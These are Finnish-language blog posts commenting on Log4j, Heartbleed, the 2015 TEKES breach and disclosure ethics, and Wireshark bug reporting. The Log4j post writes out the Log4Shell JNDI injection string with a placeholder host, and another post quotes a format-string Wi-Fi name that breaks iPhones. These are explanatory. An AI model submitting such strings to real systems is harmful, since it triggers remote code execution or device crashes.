Esimakua kyberpandemiasta

Turvallisuusalalla on pitkään spekuloitu kyberpandemian mahdollisuudella. Heräämmekö jonain päivänä maailmaan, jossa tietomurrot tai haittaohjelmat riivaavat kaikkia järjestelmiä saaden yhteiskunnan ja kansalaisten arjen sekaisin?

Tänä viikonloppuna on saatu esimakua kyberpandemiasta. Syynä on Log4j-niminen Java-komponentti, jota käytetään monissa nettipalveluissa. Ohjelmassa on ominaisuus, joka mahdollistaa yksinkertaisen hyökkäyksen: välittämällä palveluun yksinkertainen merkkijono palvelin saadaan hakemaan mistä tahansa nettiosoitteesta koodia, joka suoritetaan saman tien. 

Haavoittuvuuksia on ollut aina, mutta Log4j on omaa luokkaansa. Sitä ei ole turhaan sanottu vuosisadan pahimmaksi tietoturva-aukoksi. Kyseessä ei ole varsinainen bugi, vaan pikemminkin suunnitteluvirhe, jota kukaan ei ole tiettävästi aiemmin huomannut käyttää hyödyksi.

Aiempi OpenSSL-haavoittuvuus, suomalaisten löytämä Heartbleed (2014), vaikutti laajalle ja havahdutti huomaamaan avoimen lähdekoodin ongelmat. Sen hyödyntäminen oli kuitenkin hankalaa ja vaati teknistä osaamista. Log4j on aivan toista maata: riittää, että vaihtaa selaimen tai puhelimen merkkijonoksi ${jndi:ldap://url-osoite-tähän/a} ja kertoo, mistä osoitteesta hyökkäyskoodi haetaan. Lapsikin sen osaa. Jopa tämä blogiteksti saattaa laukaista koodin hakuyrityksen, joskin url-osoite-tähän on osoitteena vaaraton.

Hieman vastaavia ongelmia on ollut aiemminkin iPhone-puhelimissa. Kesällä uutisoitiin, miten iPhonen verkkoasetukset hajoavat, jos puhelimella liittyy %p%s%s%s%s%n -nimiseen wifi-verkkoon. Edes puhelimen uudelleenkäynnistys ei auta. Aiemmin puhelimen on voinut sammuttaa lisäämällä tekstiviestiin tietyn merkkiyhdistelmän.

Nyt Log4j:n vaarallinen ominaisuus on korjattu, mutta korjausten asentaminen kaikkiin haavoittuviin järjestelmiin on jättimäinen työ. Kyse ei ole pelkistä nettipalveluista, vaan Log4j-komponenttia on tavattu myös erilaisista elektroniikkalaitteista. Suurin osa palveluista ei edes tiedä, että jossain koneiston uumenissa on haavoittuva palanen. Se selviää vain kokeilemalla, miten palvelu vastaa hakkerointiyritykseen.

Täsä Githubin listasta saa jonkinlaisen aavistuksen ongelman laajuudesta. 

Nykyiset tietojärjestelmät koostuvat sadoista komponenteista, joista suurin osa on nettiyhteisön kehittämiä tai ylläpitämiä. Niitä pinotaan päällekkäin ja rinnakkain ilman, että kukaan tietää, mitä haavoittuvuuksia pinoon jää. "Avoin lähdekoodi on turvallista, koska kuka tahansa voi nähdä virheet" on vanha mantra, joka ei pidä enää paikkaansa. 

Kaikki käyttävät vapaita ohjelmia -- toisten kirjoittamaa koodia -- eikä kukaan vastaa kokonaisuudesta. Kriittistä koodia saattaa ylläpitää joku yksittäinen henkilö oman työnsä ohella, tai sitten sitä ei ylläpidä enää kukaan. Log4j:n ylläpidosta huolehtii tiettävästi kolme tai neljä henkilöä, ja hekin vain vapaa-ajan projektina. Silti miljoonat ihmiset ja laitteet käyttävät heidän ilmaistyötään.

Tapahtuma herättää kysymään, millaisia pommeja nettipalveluissa piilee? Kuka löytää ne ensimmäisenä - rosvot, tiedustelupalvelut vai valkohattuhakkerit? Tämä viikonloppu ainakin on IT-ylläpidon painajainen. Luultavasti ensi viikolla tulemme näkemään monia tietomurtoja ja vahingontekoja. Joululomat on peruttu muiltakin kuin teho-osaston hoitajilta.

On ollut kiinnostavaa seurata Suomen uutisointia asiasta. Maailmalla Log4j on iso uutinen, "internet is on fire!". Suomessa sen ovat noteeranneet Ilta-Sanomat, Iltalehti ja Helsingin Sanomat. Yle ei vielä tähän mennessä ole reagoinut. It-maailmaa ymmärtäviä toimittajia on vähän, eikä heitä ole viikonloppuisin vuorossa. Tivi-lehti kirjoitti asiasta jo perjantaina, jolloin vakavuudesta ei ollut vielä täyttä selvyyttä. Tilanteen vaarallisuus on paljastunut vasta viikonlopun kuluessa. 

Voi vain toivoa, että jos kyberpandemia joskus iskee, se ei ala ainakaan viikonloppuna.

Lisäys 14.12.2021: Vaaralliseksi osoittautunut ominaisuus lisättiin Apache Log4j-komponenttiin versiossa 2.0-beta9, joka julkaistiin 21.9.2013. Vaara huomattiin yli kahdeksan vuotta myöhemmin ja varoitus julkaistiin 9.12.2021. Siinä välissä kukaan ei huomannut asiaa tai ei ainakaan raportoinut siitä vaan käytti aukkoa itse tietomurtoihin. Mitähän muita pommeja järjestelmissä tikittää? 

JNDI injection -riskistä oli esitelmä Black Hat 2016 -konferenssissa, mutta puhujat eivät itsekään osanneet yhdistää uhkaa Apache Strutsiin. 

Nyt huolestuttavin skenaario on, että joku kirjoittaa haavoittuvuutta hyödyntävän madon. Se voisi levitä palvelimesta toiseen ja halvaannuttaa ison osan internetiä.

Hei, tässä on turva-aukko - mitäs minä nyt teen?

Olipa tämä 10.3.2015 todellinen tietoturvan superpäivä! Talentumin Kybertalkoot-seminaari, Baswaren laskutusohjelman haavoittuvuus, väitetty Facebookin salakuuntelu -- sekä näyttävästi yleismedioissa uutisoitu TEKESin tietomurto (alkuperäinen, hieman liioitteleva juttu). Näistä viimeinen tapaus ansaitsee muutaman kommentin ja pohdinnan.

Olet it-ammattilainen ja täyttämässä web-lomaketta, kun huomaat siinä olevan tietoturva-aukon. Jokainen alalla toimiva tietää, mitä tehdä sen jälkeen: ottaa yhteyttä joko sivuston omistajaan tai kyberturvallisuuskeskukseen. Tämä on oikeaoppinen ja ainoa laillinen toimintatapa.

Mutta asiassa on toinenkin, inhimillinen puoli. Kukaan ei halua huutaa sutta turhaan. Ennen kuin ilmoittaa aukosta on pakko varmistaa, että kyseessä on tosiaan aukko, josta pääsee sisään järjestelmään. Ovestakaan ei voi tietää, onko se lukossa vai ei, ennen kuin on tarttunut kahvaan ja kokeillut.

On myös helppo kuvitella, että aukko herättää uteliaisuuden. Hei, mihin kaikkialle tästä pääsee? Entä jos kokeilen toista parametria? Mitähän tiedostoja tänne palvelimelle on säilötty? Yksinkertaisimmillaan koko tietovarasto kopioituu omalle koneelle yhdellä kopiointi- tai esim. wget-käskyllä.

Tässä tapauksessa aukon löytäjät ilmoittivat siitä itse TEKESille, joka tutki lokejaan ja havaitsi, että aukon kautta oli tosiaan ladattu muiden lähettämiä hakemuksia. TEKES teki rikosilmoituksen poliisille, joka pidätti miehet kuulusteluja varten ja tutkii nyt tapahtunutta törkeänä petoksena.

Rikosnimike kuulostaa oudolta; pikemminkin kyseessä olisi tietomurto. Näillä on iso ero, sillä petoksesta voi saada neljä vuotta vankeutta, tietomurrosta vain yhden. Ero vaikuttaa ratkaisevasti siihen, millaisia pakkokeinoja poliisi voi käyttää tutkinnassaan.

On vaikea kuvitella, miten oikeudettomasti ladatut TEKES-hakemukset voisivat täyttää törkeän petoksen tunnusmerkistön. Vielä suurempi kysymys on, miksi tekijät ilmoittaisivat itse teostaan uhrille.

Hakkerit perustelevat usein tietomurtoja sillä, että kohdejärjestelmä oli huonosti suojattu. Ajatuksena kai on, että jos ovessa on huono lukko tai avain on unohtunut paikalleen, sisään saa mennä vapaasti. Näinhän ei tietenkään ole. Murto on murto, jos pääsy on oikeudeton ja tahallinen.

Uutisoinnissa kaikki moitteet ovat kaatuneet tekijöiden niskaan. Ehkä jotain vastuuta kuuluu myös TEKESille itselleen. Järjestelmiin ei saa jäädä niin yksinkertaisia aukkoja, että niihin törmää vahingossa. Asiakastietoja sisältävien palveluiden on oltava tietoturvallisia. Ylläpito kantaa siitä oman vastuunsa.

Kuka muu on mahtanut huomata saman aukon? Onko joku vienyt tietoja ja jättänyt ilmoittamatta asiasta uhrille? Tätä emme tietäisi vieläkään, elleivät uusimmat tekijät olisi ilmoittaneet asiasta oma-aloitteisesti. Mutta samalla he saivat niskaansa raskaat syytteet. "Poliisi pitää rikosepäilyä erittäin vakavana", siteeraa Iltalehti tutkintaa johtavaa rikostarkastaja Jukkapekka Risua.

Niinpä sinä, tavallinen it-ammattilainen, muista tämä: jos törmäät vahingossa nettipalvelussa olevaan aukkoon, ilmoita siitä oitis eteenpäin äläkä pengo asiaa ominpäin. Epävarmoissa tapauksissa on varminta jättää ilmoitus kokonaan tekemättä, jotta et itse joudu hankaluuksiin. Kyllä sen joku hakkeri kuitenkin löytää -- sitten joskus.

Lisäys 17.3.2015: Iltalehti ei kursaile - sen videolla naamioitunut tekijä näyttää omalta koneeltaan, miten kokoomuksen web-sivuilta löytyy wp-confit.php-tiedoston unohtunut varmuuskopio, joka puolestaan avaa pääsyn koko järjestelmään.

Lisäys 18.3.2015: Ja mitä tehdä, jos ilmoitus uhrille ei tuota tulosta? 

Heartbleed, tietoturvan kohuviikon huipennus

NSA-kirjan valmistumisen jälkeen on taas enemmän aikaa bloggaamiselle.

Tämä viikko (7-13.4.2014) on ollut tietoturvan kohuviikko. Ensin kaiken huomion sai Windows XP:n tuen loppuminen ja siitä seuraavat tietoturvariskit. Samana päivänä (8.4.) tulivat julki tiedot suomalaisten ja Googlen löytämästä ns. Heartbleed-aukosta, jonka vaikutukset ovat moninkertaisesti suuremmat kuin vanhan XP:n riskit.

Heartbleed on mielenkiintoinen monellakin tavalla. Onnittelut oululaiselle Codenomiconille sen löytämisestä ja eritoten hyvästä viestinnästä. Heartbleedistä tuli it-historian ensimmäinen brändätty turva-aukko. Codenomiconin ansiosta bugi sai kuvaavan logon ja helposti muistettavan nimen. Suomalaiset ovat aina olleet hyviä tekniikasta, mutta nyt näköjään kansainvälinen viestintäkin on hallinnassa. Tämä on kerrassaan loistava juttu! Codenomicon toi monta näkyvää sulkaa Suomen tietoturvaosaamisen hattuun. Kansainvälinen tietoturvamaine on muutakin kuin urkintaa tai sen puutetta.

Bugi on ollut avoimessa koodissa kaksi vuotta kenenkään huomaamatta. Usko siihen, että avoin koodi olisi automaattisesti turvallista koska niin moni voi tarkistaa sen, osoittautui vääräksi. Itse asiassa NSA tai kuka tahansa voi lisätä kriittiseen koodiin tahallisia turva-aukkoja ja hyödyntää niitä pitkään, ennen kuin asia paljastuu.

OpenSSL-aukko olisi hyvin voinut olla NSA:n työtä. Ilmeisesti virheen tehnyt ohjelmoija on kuitenkin saksalainen, eikä hänellä ole NSA-yhteyksiä. Mutta kuka tietää, mitä kulissien takana oikeasti on tapahtunut?

Turva-aukot saavat paljon huomiota mediassa, ovathan ongelmat ja riskit aina uutisen arvoisia. Median mukaan kyseessä on nettihistorian suurin ja vakavin turva-aukko. Ihmisiä kehotetaan jälleen vaihtamaan salasanat Facebookiin, Twitteriin ja kaikkiin tärkeisiin palveluihin. Uutisoinnin pohjanoteeraus on tämä Voicen artikkeli, jossa aukkoa kutsutaan virukseksi. Sen sijaan hyvä artikkeli löytyy Washington Postista.

Heartbleed on siinä mielessä loistava turva-aukko, että kerrankin käyttäjän ei tarvitse päivittää mitään. Kaikki työ jää web-palveluiden ylläpidon vastuulle. Älypuhelimista tai työasemista Heartbleedin käyttö olisi erittäin vaikeaa.

Missään en ole nähnyt tarkkaa kuvausta siitä, miten Heartbleed-bugia oikeasti voi hyödyntää. Voi olla, että OpenSSL-kirjastoa käytetään 66 % nettipalveluista, mutta kyse on vasta teknisestä haavoittuvuudesta. Riski syntyy siitä, miten helppo Heartbleediä on hyödyntää ja miten vakavaa vahinkoa sillä voi saada aikaan.

Heartbleedin avulla palvelimen muistin sisältöä voidaan "lypsää" sitä sopivasti kysyvälle ohjelmalle. Tulokset ovat satunnaisia. Voi olla, että hyökkääjä saa pelkkää bittiroskaa. Toisaalta hän voi saada edellisten käyttäjien tunnuksia, salasanoja ja jopa palvelimen omat salausavaimet. Pahinta on, ettei tästä jää mitään merkkejä palvelimen lokiin. Ylläpidon on siis mahdotonta tietää, onko heiltä lypsetty salaista tietoa. Havainnollinen kuva asiasta on täällä, hyvä selitys suomeksi myös täällä.

Hyökkäyksen kohdistaminen tiettyyn käyttäjään on kuitenkin vaikeaa. Hyökkääjän pitäisi ensin saada uhri ottamaan yhteyttä omaan koneeseensa ja sen jälkeen jatkaa Man-in-the-middle-tekniikalla suojatulle palvelimelle. Ei kovin helppoa.

Lisäksi on mahdollista hyökätä OpenSSL:ää käyttäviä kuormanjakopalvelimia vastaan ja saada -- jälleen kerran satunnaisten -- ihmisten tunnuksia. Toisaalta kaikki OpenSSL:ää käyttävät ohjelmistot eivät hyödynnä kirjaston Heartbeat-ominaisuutta, joten niissä vaaraa ei ole.

Vaikka haavoittuvuus on vakava, sen hyödyntäminen on jossain määrin onnen kauppaa ja vaatii sen verran yritystä, että tuskin kukaan jaksaa nähdä vaivaa Facebookin tai Twitterin salasanojen vuoksi. Pankkipalvelut ovat sitten toinen juttu.

Pahinta, mitä hyökkääjä voi Heartbleedin avulla saada, on palvelimen oma SSL-avain. Sillä pystyisi avaamaan kaikki aiemmat (jos niiden salattu liikenne on kaapattu ja tallennettu) sekä tulevat SSL-salatut yhteydet. En pysty arvioimaan tämän riskin suuruutta, oletan sen aika pieneksi. Lisäksi PFS-tekniikkaa (Perfect Forward Secrecy) käyttävät avaintenvaihtoprotokollat ovat suojassa. Niitä käyttävät mm. Facebook ja Nordea palveluissaan.

Lisäys klo 18.15: SSL-avaimen vuotaminen saattaa olla jopa kokonaan mahdotonta.

Lisäys klo 23.30: Onpa muuten hassua, että kerrankin Microsoft ei liity mitenkään tietoturvariskiin. Itse asiassa juuri sen web-palvelimet ovat niitä turvallisia, ja asiakaspään käyttöjärjestelmällä ei ole merkitystä. (Oliko vain sattumaa, että Codenomicon julkisti haavoittuvuuden juuri XP:n tuen päättymispäivänä, kysyy tämä sivusto).

Ja ihan toinen juttu -- em. Vergen lukijapalautteista poimin seuraavan: "Look, I don’t want to say heartbleed is not dangerous and might have caused a lot of harms, we simply don’t know yet. The media did a lot of fear mongering and took it to the extreme. The final nails in the coffin was when my wife (a nurse) a non-technical person came home the other day hysterically about how everything was compromised and some news network advised people emptying out their accounts until everything was fixed to protect themselves. Needless to say, I was pretty upset about the whole thing and the damaged those folks caused. It took hours of convincing to stop her from going to the bank the next morning to do exactly that. What a mess."

Lisäys 12.4.14 klo 8: Iltalypsy kannattaa - suomalainen Ilkka Mattila oli toinen, joka osoitti salaisen avaimen hankkimisen mahdolliseksi: https://www.cloudflarechallenge.com/heartbleed Jälleen yksi sulka myös Suomen tietoturvaosaamisen hattuun. Hienoa!

Ylireagointia tietoturvan haavoittuvuuksista?

It-alan mediat julkaisivat eilen uutisen, jollaisia olemme tottuneet kuulemaan liki päivittäin: ohjelmasta XYZ on löytynyt haavoittuvuus, jonka vuoksi käyttäjien tulisi päivittää uuteen versioon. Jopa Viestintäviraston CERT-FI julkaisi tiedotteen asiasta.

Kyseinen ohjelma oli Winshark, jota käytetään verkkoliikenteen seurantaan ja analysointiin. Sillä voidaan tutkia esimerkiksi ip-pakettien sisältöä ja kaapata tietyn protokollan mukaista liikennettä - vaikkapa sähköpostin salasanoja. It-ammattilaisten ohella Winshark on suosittu hakkerien keskuudessa, sillä se poimii näppärästi kiinnostavat paketit vaikkapa suojaamattoman wlan-tukiaseman liikenteestä.

Entä se "haavoittuvuus"? Kyse oli siitä, että tietyllä tavalla väärin muodostetut ip-paketit voivat kaataa ohjelman. Wau.

Ennen ohjelman kaatumiseen johtavia tilanteita kutsuttiin bugeiksi. Nyt niistä on tullut haavoittuvuuksia, joista pitää tiedottaa. Se, että joku manipuloi keinotekoisesti ip-paketteja ja kaataa niillä mahdollisesti verkkoa salakuuntelevan hakkerin ohjelman, ei kuulosta kovin vaaralliselta. Tuskin edes tiedottamisen arvoiselta.

Tietoturvavaroituksista on tullut päivittäistä liturgiaa, jotka uutisoidaan tavan vuoksi. Haavoittuvuuksien metsästäminen ja niistä raportointi on eräänlaista urheilua, jolla on vain vähän tekemistä tietoturvan kanssa. Lisäksi jatkuvat varoitukset luovat pelon ilmapiiriä, johon turtuneina käyttäjät eivät jaksa enää reagoida aidosti tärkeisiin uutisiin. Media on niin tottunut tietoturvan huonoihin uutisiin, ettei se muista aina olla kriittinen, eikä varsinkaan muista kertoa tietoturvan hyvistä uutisista. Niitäkin nimittäin on.

Alkuperäinen tiedote tästä "haavoittuvuudesta" löytyy ohjelman omalta kotisivulta.